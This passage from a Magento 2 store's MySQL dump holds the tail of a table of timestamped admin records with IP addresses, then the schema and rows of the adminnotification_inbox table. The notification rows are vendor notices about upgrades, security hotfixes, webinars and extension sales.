15:44:34','103.100.7.155'),(161,NULL,1,1,'2020-06-07 11:36:03','2024-01-14 15:44:34','103.100.7.155'),(162,NULL,1,1,'2020-06-08 11:12:59','2024-01-14 15:44:34','103.97.210.211'),(163,NULL,1,1,'2020-06-08 11:55:48','2024-01-14 15:44:34','103.100.7.155'),(164,NULL,1,1,'2020-06-09 09:16:35','2024-01-14 15:44:34','103.121.114.145'),(165,NULL,1,1,'2020-06-09 14:26:04','2024-01-14 15:44:34','103.100.7.155'),(166,NULL,1,1,'2020-06-09 15:52:55','2024-01-14 15:44:34','103.100.7.155'),(167,NULL,1,1,'2020-06-10 16:22:53','2024-01-14 15:44:34','103.100.7.155'),(168,NULL,1,1,'2020-06-10 17:12:55','2024-01-14 15:44:34','103.100.7.155'),(169,NULL,1,1,'2020-06-13 07:50:20','2024-01-14 15:44:34','103.121.114.145'),(170,NULL,1,1,'2020-06-13 07:50:26','2024-01-14 15:44:34','103.121.114.145'),(171,NULL,1,1,'2020-06-13 16:19:25','2024-01-14 15:44:34','106.210.1.134'),(172,NULL,1,1,'2020-06-14 09:43:02','2024-01-14 15:44:34','103.97.210.222'),(173,NULL,1,1,'2020-06-14 09:43:09','2024-01-14 15:44:34','103.97.210.222'),(174,NULL,1,1,'2020-06-14 10:59:31','2024-01-14 15:44:34','103.97.210.222'),(175,NULL,1,1,'2020-06-14 11:33:51','2024-01-14 15:44:34','103.100.7.155'),(176,NULL,1,1,'2020-06-14 12:26:12','2024-01-14 15:44:34','103.100.7.155'),(177,NULL,1,1,'2020-06-15 12:21:39','2024-01-14 15:44:34','103.100.7.155'),(178,NULL,1,1,'2020-06-15 12:49:50','2024-01-14 15:44:34','103.100.7.155'),(179,NULL,1,1,'2020-06-15 13:51:42','2024-01-14 15:44:34','103.100.7.155'),(180,NULL,1,1,'2020-06-17 07:04:24','2024-01-14 15:44:34','103.121.114.134'),(181,NULL,1,1,'2020-06-18 13:48:03','2024-01-14 15:44:34','103.100.7.168'),(182,NULL,1,1,'2020-06-20 03:17:00','2024-01-14 15:44:34','103.100.7.168'),(183,NULL,1,1,'2020-06-20 04:06:45','2024-01-14 15:44:34','103.100.7.168'),(184,NULL,1,1,'2020-06-20 04:28:53','2024-01-14 15:44:34','103.100.7.168'),(185,NULL,1,1,'2020-06-20 05:08:51','2024-01-14 15:44:34','103.100.7.168'),(186,NULL,1,1,'2020-06-20 05:48:48','2024-01-14 15:44:34','103.100.7.168'),(187,NULL,1,1,'2020-06-20 06:37:10','2024-01-14 15:44:34','103.100.7.168'),(188,NULL,1,1,'2020-06-20 06:58:05','2024-01-14 15:44:34','103.100.7.168'),(189,NULL,1,1,'2020-06-21 14:20:14','2024-01-14 15:44:34','103.97.210.163'),(190,NULL,1,1,'2020-06-21 15:10:13','2024-01-14 15:44:34','103.97.210.163'),(191,NULL,1,1,'2020-06-22 03:45:34','2024-01-14 15:44:34','103.100.7.168'),(192,NULL,1,1,'2020-06-22 05:10:29','2024-01-14 15:44:34','103.100.7.168'),(193,NULL,1,1,'2020-06-22 08:48:45','2024-01-14 15:44:34','103.100.7.168'),(194,NULL,1,1,'2020-06-22 17:46:09','2024-01-14 15:44:34','103.97.210.163'),(195,NULL,1,1,'2020-06-23 10:08:29','2024-01-14 15:44:34','103.97.210.219'),(196,NULL,1,1,'2020-06-23 12:14:08','2024-01-14 15:44:34','103.97.210.219'),(197,NULL,1,1,'2020-06-23 12:17:19','2024-01-14 15:44:34','47.31.31.225'),(198,NULL,1,1,'2020-06-25 07:14:37','2024-01-14 15:44:34','103.97.210.219'),(199,NULL,1,1,'2020-06-25 09:28:00','2024-01-14 15:44:34','103.97.210.219'),(200,NULL,1,1,'2020-06-25 13:16:57','2024-01-14 15:44:34','103.100.7.168'),(201,NULL,1,1,'2020-06-26 11:55:04','2024-01-14 15:44:34','103.97.210.219'),(202,NULL,1,1,'2020-06-26 12:40:26','2024-01-14 15:44:34','103.100.7.168'),(203,NULL,1,1,'2020-06-26 12:41:39','2024-01-14 15:44:34','103.97.210.219'),(204,NULL,1,1,'2020-06-26 13:18:30','2024-01-14 15:44:34','103.100.7.168'),(205,NULL,1,1,'2020-06-27 07:20:30','2024-01-14 15:44:34','103.100.7.168'),(206,NULL,1,1,'2020-06-27 11:32:37','2024-01-14 15:44:34','103.100.7.168'),(207,NULL,1,1,'2020-06-27 11:55:27','2024-01-14 15:44:34','103.97.210.219'),(208,NULL,1,1,'2020-06-27 13:57:07','2024-01-14 15:44:34','103.100.7.168'),(209,NULL,1,1,'2020-06-28 12:43:21','2024-01-14 15:44:34','103.97.210.219'),(210,NULL,1,1,'2020-06-28 12:44:22','2024-01-14 15:44:34','103.100.7.168'),(211,NULL,1,1,'2020-07-02 03:31:14','2024-01-14 15:44:34','103.224.146.207'),(212,NULL,1,1,'2020-07-02 04:52:54','2024-01-14 15:44:34','103.224.146.207'),(213,NULL,1,1,'2020-07-02 09:53:30','2024-01-14 15:44:34','103.121.114.140'),(214,NULL,1,1,'2020-07-02 09:53:41','2024-01-14 15:44:34','103.121.114.140'),(215,NULL,1,1,'2020-07-02 13:18:43','2024-01-14 15:44:34','103.121.114.140'),(216,NULL,1,1,'2020-07-04 12:02:11','2024-01-14 15:44:34','103.224.146.207'),(217,NULL,1,1,'2020-07-04 12:38:22','2024-01-14 15:44:34','103.224.146.207'),(218,NULL,1,1,'2020-07-05 16:52:03','2024-01-14 15:44:34','103.224.146.207'),(219,NULL,1,1,'2020-07-05 17:36:24','2024-01-14 15:44:34','103.97.210.115'),(220,NULL,1,1,'2020-07-05 17:38:46','2024-01-14 15:44:34','103.224.146.207'),(221,NULL,1,1,'2020-07-07 13:42:57','2024-01-14 15:44:34','103.224.146.126'),(222,NULL,1,1,'2020-07-09 04:28:15','2024-01-14 15:44:34','103.224.146.126'),(223,NULL,1,1,'2020-07-11 10:18:35','2024-01-14 15:44:34','103.121.115.202'),(224,NULL,1,1,'2020-07-11 12:29:16','2024-01-14 15:44:34','103.121.115.202'),(225,NULL,1,1,'2020-07-11 14:36:54','2024-01-14 15:44:34','103.224.146.95'),(226,NULL,1,1,'2020-07-13 03:32:20','2024-01-14 15:44:34','103.224.146.95'),(227,NULL,1,1,'2020-07-13 12:10:12','2024-01-14 15:44:34','103.224.146.95'),(228,NULL,1,1,'2020-07-13 12:17:01','2024-01-14 15:44:34','103.97.210.223'),(229,NULL,1,1,'2020-07-14 07:32:10','2024-01-14 15:44:34','103.97.210.223'),(230,NULL,1,1,'2020-07-14 11:09:17','2024-01-14 15:44:34','103.97.210.223'),(231,NULL,1,1,'2020-07-14 11:41:01','2024-01-14 15:44:34','103.97.210.223'),(232,NULL,1,1,'2020-07-14 14:33:19','2024-01-14 15:44:34','103.224.146.95'),(233,NULL,1,1,'2020-07-15 10:32:33','2024-01-14 15:44:34','103.121.115.210'),(234,NULL,1,1,'2020-07-15 11:43:15','2024-01-14 15:44:34','103.121.115.210'),(235,NULL,1,1,'2020-07-16 08:37:32','2024-01-14 15:44:34','103.97.210.186'),(236,NULL,1,1,'2020-07-16 09:41:35','2024-01-14 15:44:34','103.97.210.186'),(237,NULL,1,1,'2020-07-16 16:47:51','2024-01-14 15:44:34','103.97.210.186'),(238,NULL,1,1,'2020-07-16 17:40:05','2024-01-14 15:44:34','103.224.146.106'),(239,NULL,1,1,'2020-07-16 18:01:13','2024-01-14 15:44:34','103.97.210.186'),(240,NULL,1,1,'2020-07-16 20:00:01','2024-01-14 15:44:34','103.97.210.186'),(241,NULL,1,1,'2020-07-17 06:00:36','2024-01-14 15:44:34','103.97.210.186'),(242,NULL,1,0,'2020-07-17 06:08:22','2024-01-14 15:44:34','49.36.131.6'),(243,NULL,1,1,'2020-07-17 10:25:01','2024-01-14 15:44:34','103.224.146.106'),(244,NULL,1,1,'2020-07-17 11:25:52','2024-01-14 15:44:34','103.97.210.186'),(245,NULL,1,1,'2020-07-17 14:48:57','2024-01-14 15:44:34','103.224.146.106'),(246,NULL,1,1,'2020-07-17 15:47:19','2024-01-14 15:44:34','103.97.210.186'),(247,NULL,1,1,'2020-07-17 16:59:26','2024-01-14 15:44:34','103.97.210.186'),(248,NULL,1,1,'2020-07-17 17:03:40','2024-01-14 15:44:34','103.224.146.106'),(249,NULL,1,1,'2020-07-17 17:31:56','2024-01-14 15:44:34','103.97.210.186'),(250,NULL,1,1,'2020-07-17 18:01:46','2024-01-14 15:44:34','103.97.210.186'),(251,NULL,1,1,'2020-07-18 03:43:15','2024-01-14 15:44:34','103.224.146.106'),(252,NULL,1,1,'2020-07-18 04:23:10','2024-01-14 15:44:34','103.224.146.106'),(253,NULL,1,1,'2020-07-18 04:44:23','2024-01-14 15:44:34','103.224.146.106'),(254,NULL,1,1,'2020-07-18 05:21:23','2024-01-14 15:44:34','103.224.146.106'),(255,NULL,1,1,'2020-07-18 05:50:27','2024-01-14 15:44:34','103.121.114.141'),(256,NULL,1,1,'2020-07-19 04:40:41','2024-01-14 15:44:34','103.224.146.100'),(257,NULL,1,1,'2020-07-20 13:34:48','2024-01-14 15:44:34','183.82.84.155'),(258,NULL,1,1,'2020-08-06 13:22:07','2024-01-14 15:44:34','103.224.146.237'),(259,NULL,1,1,'2020-08-06 14:23:37','2024-01-14 15:44:34','103.224.146.237'),(260,NULL,1,1,'2020-08-06 14:57:38','2024-01-14 15:44:34','103.224.146.237'),(261,NULL,1,1,'2020-08-06 15:26:19','2024-01-14 15:44:34','103.224.146.237'),(262,NULL,1,1,'2020-08-07 13:09:50','2024-01-14 15:44:34','103.224.146.237'),(263,NULL,1,1,'2020-08-07 13:55:38','2024-01-14 15:44:34','103.224.146.237'),(264,NULL,1,1,'2020-08-08 05:06:41','2024-01-14 15:44:34','103.224.146.237'),(265,NULL,1,1,'2020-08-08 06:04:28','2024-01-14 15:44:34','103.224.146.237'),(266,NULL,1,1,'2020-08-12 05:33:36','2024-01-14 15:44:34','103.224.146.237'),(267,NULL,1,1,'2020-08-18 11:07:58','2024-01-14 15:44:34','103.224.146.237'),(268,NULL,1,1,'2020-09-06 11:01:41','2024-01-14 15:44:34','103.121.114.144'),(269,NULL,1,1,'2020-09-09 14:55:55','2024-01-14 15:44:34','103.224.146.129'),(270,NULL,1,1,'2020-10-05 08:52:30','2024-01-14 15:44:34','103.224.146.150'),(271,NULL,1,1,'2020-10-05 09:02:51','2024-01-14 15:44:34','103.121.114.158'),(272,NULL,1,1,'2020-10-05 11:15:27','2024-01-14 15:44:34','47.30.221.100'),(273,NULL,1,1,'2021-01-05 06:25:02','2024-01-14 15:44:34','103.112.34.53'),(274,NULL,1,1,'2021-01-05 06:56:31','2024-01-14 15:44:34','103.224.146.93'),(275,NULL,1,1,'2021-02-04 05:43:25','2024-01-14 15:44:34','103.112.34.223'),(276,NULL,1,1,'2021-02-04 05:43:34','2024-01-14 15:44:34','103.112.34.223'),(277,NULL,1,1,'2021-02-25 14:37:07','2024-01-14 15:44:34','103.100.7.61'),(278,NULL,1,1,'2021-03-23 11:02:58','2024-01-14 15:44:34','182.68.16.97'),(279,NULL,1,1,'2022-04-07 08:37:44','2024-01-14 15:44:34','122.162.149.123'),(280,NULL,1,1,'2022-04-07 08:38:04','2024-01-14 15:44:34','122.162.149.123'),(281,NULL,1,1,'2022-04-07 08:39:40','2024-01-14 15:44:34','49.36.212.134'),(282,NULL,1,1,'2022-04-07 08:49:17','2024-01-14 15:44:34','103.164.210.218'),(283,NULL,1,1,'2022-04-07 09:10:49','2024-01-14 15:44:34','122.162.149.123'),(284,NULL,1,1,'2022-04-29 18:00:07','2024-01-14 15:44:34','49.36.212.106'),(285,NULL,3,1,'2024-01-14 16:48:10','2024-01-14 16:52:30','127.0.0.1');

--
-- Table structure for table `adminnotification_inbox`
--

CREATE TABLE `adminnotification_inbox` (
  `notification_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Notification ID',
  `severity` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Problem type',
  `date_added` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Create date',
  `title` varchar(255) NOT NULL COMMENT 'Title',
  `description` text DEFAULT NULL COMMENT 'Description',
  `url` varchar(255) DEFAULT NULL COMMENT 'Url',
  `is_read` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Flag if notification read',
  `is_remove` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Flag if notification might be removed',
  PRIMARY KEY (`notification_id`),
  KEY `ADMINNOTIFICATION_INBOX_SEVERITY` (`severity`),
  KEY `ADMINNOTIFICATION_INBOX_IS_READ` (`is_read`),
  KEY `ADMINNOTIFICATION_INBOX_IS_REMOVE` (`is_remove`)
) ENGINE=InnoDB AUTO_INCREMENT=77 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Adminnotification Inbox';

--
-- Dumping data for table `adminnotification_inbox`
--

INSERT INTO `adminnotification_inbox` VALUES (1,1,'2020-01-09 16:21:20','Attention! You use an ancient version of Blog Extension. It is strongly recommended to update Blog Extension to the newest version 2.9.1',' \n                                    https://magefan.com/magento2-blog-extension?ancient=2.8.0                                 ','https://magefan.com/magento2-blog-extension?ancient=2.8.0',0,0),(2,4,'2020-01-09 16:21:20','FAQ: How to configure &quot;read more&quot; in your Magento 2 blog post',' If you still don\'t know how to configure read more functionality in your magento 2 blog post, please read this article.\n                    Online documentation for Magento 2 blog extension is also available on our website. http://goo.gl/XOEdpy ','http://magefan.com/blog/add-read-more-tag-to-blog-post-content/?from=notification1',0,0),(3,4,'2020-01-09 16:21:20','NEW Magento 2 Alternate Hreflang Tags Extension with Better Store Switcher\n    ',' Do you manage Magento multi-language store without using Hreflang tags? You should definitely enable them. ','https://magefan.com/magento2-alternate-hreflang-extension',0,0),(4,4,'2020-01-13 18:02:52','eCommerce is an ocean of opportunity. Take our quiz and find out if you are a pilot fish, octopus, or shark.','Find out if you’re ready to sell with the big fish by taking our brief quiz designed to identify your competitive selling potential. Answer our set of quick questions to see where you stack up and receive personalized resources to give your digital growth strategy some teeth. http://bit.ly/2NkNvhS','http://bit.ly/2NkNvhS',0,0),(5,4,'2020-01-21 17:05:32','2020 goal: Is your product content keeping up with your customers?','Magento Page Builder gives you fast content updates and even faster growth. Download our eBook to learn more. Link here: http://bit.ly/2NyTuQf','http://bit.ly/2NyTuQf',0,0),(6,4,'2020-01-22 13:09:38','NEW  Magento 2 CMS Display Rules Extension.','Magento 2 CMS Display Rules is the extension for Magento 2 stores that allows online merchants to manage the display of CMS Pages and CMS Block for different customer groups, on different dates, days of the week, the exact time during the day and even conditions based on product attributes and shopping cart items and total.','https://magefan.com/magento-2-cms-display-rules-extension?from=ntf-new',0,0),(7,4,'2020-01-27 16:01:40','Learn The 6 Sweet Features Behind Every Irresistible eCommerce Experience. ','92% percent of online shoppers call it quits before checkout over poor site performance. Discover the six essential features your commerce platform needs to create truly memorable customer moments. Link here: http://bit.ly/2RrcS4d\n','http://bit.ly/2RrcS4d',0,0),(8,1,'2020-01-28 20:09:22','Magento Open Source 2.3.4 delivers important security updates and features to help you build a more engaging customer experience – 1/28/2020','The latest releases of Magento Open Source – 2.3.4, 2.3.3-p1, and 2.2.11 – are now generally available. The latest release of Magento Open Source includes important security enhancements along with new functionality and platform quality improvements. With these important updates we strongly recommend that you upgrade to ensure your sites maintain the highest level of security. You can review the release notes for more information about all of the enhancements. Learn how this release can help you build a more engaging customer experience at Magento.com/blog.','https://devdocs.magento.com/guides/v2.3/release-notes/bk-release-notes.html',0,0),(9,1,'2020-01-29 15:23:58','Attention! You use an ancient version of Blog Extension. It is strongly recommended to update Blog Extension to the newest version 2.9.2',' \n                                    https://magefan.com/magento2-blog-extension?ancient=2.8.0                                 ','https://magefan.com/magento2-blog-extension?ancient=2.8.0',0,0),(10,4,'2020-02-03 19:53:41','You are invited: Seize the New Year– 5 Growth Strategies for 2020.','Join us for a live webinar on February 13th with Magento experts Shannon Hane and Matthew Wasley from Adobe to learn the latest eCommerce strategies to accelerate revenue growth in 2020. Register today: http://bit.ly/2GPpb4b','http://bit.ly/2GPpb4b',0,0),(11,4,'2020-02-10 16:41:26','Are you putting off integrating your ERP and eCommerce?','Get started on the journey to a more integrated and profitable eCommerce business. Download our comprehensive guide, eCommerce + ERP: Better Together. http://bit.ly/33XMHVV','http://bit.ly/33XMHVV',0,0),(12,4,'2020-02-12 15:11:23','Join Tomorrow\'s Webinar: Seize the New Year– 5 Growth Strategies for 2020.','Join us for a live webinar tomorrow, February 13th with Magento experts Shannon Hane and Matthew Wasley from Adobe to learn the latest eCommerce strategies to accelerate revenue growth in 2020. Register today: http://bit.ly/2GPpb4b','http://bit.ly/2GPpb4b',0,0),(13,1,'2020-03-05 21:25:23','Retrieving data. Wait a few seconds and try to cut or copy again.','&quot;We have discovered an error in Magento 2.3.4 that can prevent a shopper from completing an order when using PayPal Express Checkout. The issue occurs for any country where the region field in the address section is a text field (as opposed to a drop-down menu).\nWe have released a hotfix to resolve this issue and recommend that merchants on Magento version 2.3.4 who are also using PayPal Express Checkout download and apply this hotfix as soon as possible to prevent further errors. Please refer to our help center for instructions and troubleshooting. A fix for this issue will be included in Magento 2.3.5.','https://support.magento.com/hc/en-us/articles/360039451972',0,0),(14,1,'2020-03-15 07:42:35','Attention! You use an ancient version of Blog Extension. It is strongly recommended to update Blog Extension to the newest version 2.9.3',' \n                                    https://magefan.com/magento2-blog-extension?ancient=2.8.0                                 ','https://magefan.com/magento2-blog-extension?ancient=2.8.0',0,0),(15,4,'2020-03-20 15:03:20','Simplify and accelerate your content updates with Page Builder','Content is critical to eCommerce engagement. In fact, 87 percent of shoppers say product content has a high impact on their purchasing decisions. Page Builder delivers a drag-and-drop content creation and management tool which simplifies your website updates from start to finish. Learn how this powerful creative tool can grow your business. Link here: http://bit.ly/2NyTuQf','http://bit.ly/2NyTuQf',0,0),(16,1,'2020-03-24 16:02:43','Important Hot Fix Available for Magento Commerce 2.3','A new Hot Fix is available to close a security issue in Magento Open Source 2.3, all versions. We recommend that users of potentially affected deployments take immediate action by updating your Magento installation with the latest patch. Please review our Security Blog via the included link for more information about the bug and how to apply the Hot Fix.','https://magento.com/security/hot-fix-available-cve-2019-8118',0,0),(17,4,'2020-04-08 16:41:38','Watch On-Demand Webinar: Seize the New Year– 5 Growth Strategies for 2020.','Magento experts Shannon Hane and Matthew Wasley from Adobe will share the latest eCommerce strategies to accelerate revenue growth in 2020. Watch now: http://bit.ly/2GPpb4b','http://bit.ly/2GPpb4b',0,0),(18,4,'2020-04-10 17:14:30','You are invited! Join our live webinar on April 23rd: The True Cost Savings of Magento Commerce 2.','Join us for The True Cost Savings of Magento Commerce 2 webinar on April 23rd. John Glasgow and Matt Boland from Adobe will discuss how your business can reduce operating costs and grow revenue. Leading solution partner Atwix will also share how they are helping customers launch innovative solutions to meet expectations in today’s environment. Register Now: https://bit.ly/2JRgJCX','https://bit.ly/2JRgJCX',0,0),(19,4,'2020-04-14 22:03:09','Upgrade to Magento Commerce with no payments for the first 3 months. ','Adobe is committed to supporting merchants during this challenging time. Upgrade to Magento Commerce 2 quickly and affordably with limited time offers. Pay nothing for the first 3 months, and our Magento Commerce launch package will get you up and running fast. Free Magento U classes will ensure your teams are fully equipped to take their digital operations to the next level. Learn more: https://bit.ly/2RBnk8M','https://bit.ly/2RBnk8M',0,0),(20,4,'2020-04-22 16:52:09','Join Tomorrow\'s Webinar: The True Cost Savings of Magento Commerce 2.','Join us for a live webinar tomorrow, April 23rd. John Glasgow and Tricia Lee from Adobe will discuss how your business can reduce operating costs and grow revenue. They will also review special limited time offers. Slava Kravchuk from Atwix, # 1 Contributing Partner, will also share a customer case study leading the way in innovative B2B retail experiences. Register Now: https://bit.ly/2JRgJCX','https://bit.ly/2JRgJCX',0,0),(21,1,'2020-04-28 18:29:06','Magento Open Source 2.3.5-p1 delivers important security updates and features ','The latest releases of Magento Open Source – 2.3.5-p1 and 2.3.4-p2 – are now generally available. The latest release of Magento Open Source includes important security enhancements along with new functionality and platform quality improvements. With these important updates we strongly recommend that you upgrade to ensure your sites maintain the highest level of security. You can review the release notes for more information about all of the enhancements. Learn how this release can help you save time and maximize resources at Magento.com/blog. ','https://devdocs.magento.com/guides/v2.3/release-notes/bk-release-notes.html',0,0),(22,4,'2020-05-04 18:02:10','One Platform to Rule them All','The lines between B2B and B2C commerce are blurring. B2C companies are adding wholesale storefronts while their traditionally B2B counterparts are increasingly selling direct to consumers.','http://bit.ly/2DPgAx0',0,0),(23,1,'2020-05-05 07:57:15','Attention! You use an ancient version of Blog Extension. It is strongly recommended to update Blog Extension to the newest version 2.9.4',' \n                                    https://magefan.com/magento2-blog-extension?ancient=2.8.0                                 ','https://magefan.com/magento2-blog-extension?ancient=2.8.0',0,0),(24,4,'2020-05-06 01:15:26','You are invited! Join our live webinar on May 21st: Fast-Track Your Move to Magento Commerce','Join our live webinar on May 21st: Fast-Track Your Move to Magento Commerce. 5x Magento Master, Brent Peterson, will share insider advice on getting your new Magento Commerce site to market in 30 days or less. Also, Tricia Lee from Adobe will cover limited-time offers designed to help merchants upgrade quickly and affordably. Register now: https://bit.ly/2L1lxpW','https://bit.ly/2L1lxpW',0,0),(25,4,'2020-05-11 23:43:35','5 Ways You Can Deliver Commerce to Your Customers','Now more than ever, eCommerce is helping individuals and communities satisfy their most essential needs. Discover the 5 ways brands are bringing commerce to their customers in our eGuide, The New Everywhere (and Every Device) Commerce. Learn more: https://bit.ly/2YIrL6l','https://bit.ly/2YIrL6l',0,0),(26,4,'2020-05-19 23:51:00','Webinar Tomorrow! Join our live webinar on May 21st: Fast-Track Your Move to Magento Commerce.','Join us tomorrow for our live webinar: Fast-Track Your Move to Magento Commerce. 5x Magento Master, Brent Peterson, will share insider advice on getting your new Magento Commerce site to market in 30 days or less. Also, Tricia Lee from Adobe will cover limited-time offers designed to help merchants upgrade quickly and affordably. Register now: https://bit.ly/2L1lxpW','https://bit.ly/2L1lxpW',0,0),(27,4,'2020-04-10 17:14:30','Watch On-On Demand: The True Cost Savings of Magento Commerce 2.','Join us for The True Cost Savings of Magento Commerce 2 webinar on April 23rd. John Glasgow and Matt Boland from Adobe will discuss how your business can reduce operating costs and grow revenue. Leading solution partner Atwix will also share how they are helping customers launch innovative solutions to meet expectations in today’s environment. Register Now: https://bit.ly/2JRgJCX','https://bit.ly/2JRgJCX',0,0),(28,4,'2020-06-08 16:43:12','Find out why Forrester positioned Adobe as a Leader in their latest B2B commerce report.','Read why Adobe was named a Leader in the “Forrester Wave: B2B Commerce Suites, Q2 2020,” and discover how we can support your business with our global partner ecosystem. https://bit.ly/2z845hk','https://bit.ly/2z845hk',0,0),(29,4,'2020-06-11 18:19:15','Ask us your questions during our upcoming webinar, The True Cost Savings of Magento Commerce 2.','Join us on Tuesday, June 23rd, for a new session of The True Cost Savings of Magento Commerce 2 now with extended time for live Q&amp;A. John Glasgow from Adobe will share how your business can reduce operating costs and grow revenue. And Slava Kravchuk from Atwix, # 1 Contributing Partner, will share a customer case study leading the way in innovative B2B retail experiences. Register Now: https://bit.ly/3dLYlsN','https://bit.ly/3dLYlsN',0,0),(30,4,'2020-06-16 19:19:54','Your input requested: Shipping &amp; Fulfillment','We would like to get your feedback on how you think about and manage your shipping &amp; fulfillment so we can build great features for you! http://selfserve.decipherinc.com/survey/selfserve/9d5/200603','http://selfserve.decipherinc.com/survey/selfserve/9d5/200603',0,0),(31,1,'2020-06-22 17:29:07','Join the webinar tomorrow and bring your questions! Register for The True Cost Savings of Magento Commerce 2 on June 23rd. ','Join us tomorrow, June 23rd, for a new session of The True Cost Savings of Magento Commerce 2 now with extended time for live Q&amp;A. John Glasgow from Adobe will share how your business can reduce operating costs and grow revenue. And Slava Kravchuk from Atwix, # 1 Contributing Partner, will share a customer case study leading the way in innovative B2B retail experiences. Register Now: https://bit.ly/3dLYlsN','https://bit.ly/3dLYlsN',0,0),(32,4,'2020-06-25 07:14:40','NEW Magento 2 Multi-Blog Extension ',' Magento 2 Multi Blog extension is the extension that allows you to have 2 separate blogs on your Magento 2 store and manage them from one admin panel. This extension could be useful for those who already use Magento 2 Blog and want to improve their store with the second blog. ','https://magefan.com/magento-2-multi-blog-extension',0,0),(33,4,'2020-05-19 23:51:00','Watch our live webinar on-demand: Fast-Track Your Move to Magento Commerce.','Watch our on-demand webinar: Fast-Track Your Move to Magento Commerce. 5x Magento Master, Brent Peterson, will share insider advice on getting your new Magento Commerce site to market in 30 days or less. Also, Tricia Lee from Adobe will cover limited-time offers designed to help merchants upgrade quickly and affordably. View now: https://bit.ly/2L1lxpW','https://bit.ly/2L1lxpW',0,0),(34,4,'2020-06-25 21:45:31','We’re proud to be recognized as Leader in B2C commerce by Forrester in their latest report. ','Read the latest “Forrester Wave: B2C Commerce Suites, Q2 2020” report to learn why “Adobe leads with flexibility, supported by a strong global partner ecosystem.” https://bit.ly/370vz4V','https://bit.ly/370vz4V',0,0),(35,4,'2020-06-26 17:15:35','Embrace digital change with insights from eCommerce leaders at Adobe Experience Maker\'s Live July 22-23.','Take part in 40+ diverse sessions at Experience Makers Live July 22-23, with topics including Magento Commerce product roadmap, delivered by John Stockton, Sr. Director of Product Marketing at Adobe, customer case studies highlighting real-world applications of Magento Commerce features and functionality, and how Magento Commerce is helping merchants adapt to the challenges of a new digital reality. Register today! https://adobe.ly/3i7XGnK','https://adobe.ly/3i7XGnK',0,0),(36,4,'2020-07-10 00:56:40','Is Your Website Selling as Much as It Can? Take our commerce self-assessment and uncover opportunities to improve conversion rates.','An engaging user experience is essential to converting casual visitors into loyal customers. Find out if your eCommerce environment inspires long-term loyalty with our commerce self-assessment which asks, Is Your Website Selling as Much as It Can? Download now: https://bit.ly/3gt16Qk','https://bit.ly/3gt16Qk',0,0),(37,1,'2020-07-15 10:32:36','Attention! You use an ancient version of Blog Extension. It is strongly recommended to update Blog Extension to the newest version 2.9.5',' \n                                    https://magefan.com/magento2-blog-extension?ancient=2.8.0                                 ','https://magefan.com/magento2-blog-extension?ancient=2.8.0',0,0),(38,4,'2020-07-21 15:55:36','Meet the Magento Commerce Interactive Product Experience.','Meet the world’s most flexible eCommerce platform by immersing yourself in the Magento Commerce Interactive Product Experience. This interactive simulation demonstrates the powerful functionality helping merchants sustain – and grow – their business. Start Product Tour: https://adobe.ly/3eR7kZ3','https://adobe.ly/3eR7kZ3',0,0),(39,4,'2020-07-28 16:12:12','Tell us about your experience with Magento','We want to hear from you! Please take a short survey about your experience using Magento Admin. Your feedback will help us improve our products and develop new features.  http://selfserve.decipherinc.com/survey/selfserve/9d5/200508?list=1','http://selfserve.decipherinc.com/survey/selfserve/9d5/200508?list=1',0,0),(40,1,'2020-07-28 16:17:11','Magento Open Source 2.4 delivers important security updates and features to accelerate your business in the changing commerce landscape – 7/28/2020','The latest releases of Magento Open Source – 2.4 and 2.3.5-p2 – are now available. The latest release of Magento Open Source includes important security enhancements along with new functionality and platform quality improvements. With these important updates we strongly recommend that you upgrade to ensure your sites maintain the highest level of security. You can review the release notes for more information about all of the enhancements. Learn how this release can help you adapt to the changing commerce landscape at Magento.com/blog.','https://devdocs.magento.com/guides/v2.4/release-notes/bk-release-notes.html',0,0),(41,4,'2020-07-31 16:37:31','Is Your Website Selling as Much as It Can? Join our upcoming webinar and learn how to turn your website into a conversion machine.','Join us on August 13 for our webinar: Is Your Website Selling As Much As It Can? Digital Strategist Ereika Stimley and eCommerce Consultant Corey Gelato will walk you through a website self-assessment and live demo that will help you uncover opportunities to increase conversions and grow revenues. Register now: https://bit.ly/2PcjcL3','https://bit.ly/2PcjcL3',0,0),(42,1,'2020-08-06 13:22:10','Attention! You use an ancient version of Blog Extension. It is strongly recommended to update Blog Extension to the newest version 2.9.6',' \n                                    https://magefan.com/magento2-blog-extension?ancient=2.8.0                                 ','https://magefan.com/magento2-blog-extension?ancient=2.8.0',0,0),(43,4,'2020-08-07 20:57:02','The Essentials of an Unforgettable Customer Experience','Learning what’s shaping tomorrow’s shopping experiences is essential for growth. Download our eBook full of advice about crafting a better buying journey using Magento Commerce and other key technologies. Download now: https://bit.ly/31tNXkq','https://bit.ly/31tNXkq',0,0),(44,4,'2020-01-14 00:00:00','Releases &amp; updates in 2019 December on Mageplaza','15 hot releases and 33 important updates last month. Read more here','https://www.mageplaza.com/blog/releases-2019-12/?utm_source=notification&amp;utm_medium=rss&amp;utm_campaign=sale-12',0,0),(45,4,'2020-03-16 00:00:00','St. Patrick\'s Day Sale Announcement','20% discount on every extension is on NOW. Ends on March 18th, don\'t miss out','https://www.mageplaza.com/deals/?utm_source=notification&amp;utm_medium=rss&amp;utm_campaign=sale-12',0,0),(46,4,'2020-03-25 00:00:00','COVID-19 Mageplaza Support Campaign','25% discount on all extensions for young business during the coronavirus pandemic. Check it out','https://www.mageplaza.com/blog/covid-mageplaza-support-young-ebusiness-during-pandemic.html?utm_source=notification&amp;utm_medium=rss&amp;utm_campaign=sale-12',0,0),(47,4,'2020-05-26 00:00:00','6 days left: COVID-19 Mageplaza Support Campaign','Mageplaza Covid-19 Support Program ends on May 31, if you have not signed up, do it NOW. 25% discount on all extensions for young business during the coronavirus pandemic','https://www.mageplaza.com/blog/covid-mageplaza-support-young-ebusiness-during-pandemic.html?utm_source=notification&amp;utm_medium=rss&amp;utm_campaign=sale-12',0,0),(48,4,'2020-06-10 00:00:00','8 New deals have been up. All hot extensions','8 high-demand Mageplaza extensions are on sales, up to 25% off. You don\'t want to miss them! Check it out NOW','https://www.mageplaza.com/deals/',0,0),(49,4,'2020-07-24 00:00:00','Flash Sales - Happy Friday - Only TODAY','15% discount on every extension is on TODAY ONLY. Check it out. Don\'t miss 